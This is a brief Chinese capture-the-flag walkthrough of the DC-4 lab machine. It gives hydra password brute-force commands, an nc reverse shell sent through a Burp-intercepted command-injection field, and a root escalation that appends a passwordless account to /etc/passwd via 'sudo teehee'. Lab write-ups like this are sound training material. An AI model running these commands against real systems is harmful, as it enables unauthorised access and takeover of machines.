DC4靶机

DC4靶机

实验环境

靶机:kali

目标机:DC-4

实验工具:burpsuite

实验步骤

arp-scan -l扫描主机ip地址

nmap扫描开的端口

进行访问80,需要输入密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 进行密码爆破

这里注意,如果第一次使用的话可能需要到命令中所存在路径去解压rockyou的压缩包之后即可使用

输入密码打开

看到执行命令,进行burp抓包

看到可控

在burp中输入nc kali的ip地址 -e /bin/bash 进行NC 命令反弹

反弹成功,进入交互式模式

看到home/mail/jim/backups中有密码

复制密码创建jim.txt

进行hydar -l jim -P jim.txt ssh://靶机地址 爆破,并进行ssh远程登录

进入到jim ,进入var

打开查看mbox发现是root用户发来的邮件

有charles用户和密码

登录charles用户

输入echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd 进行提权,成功

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值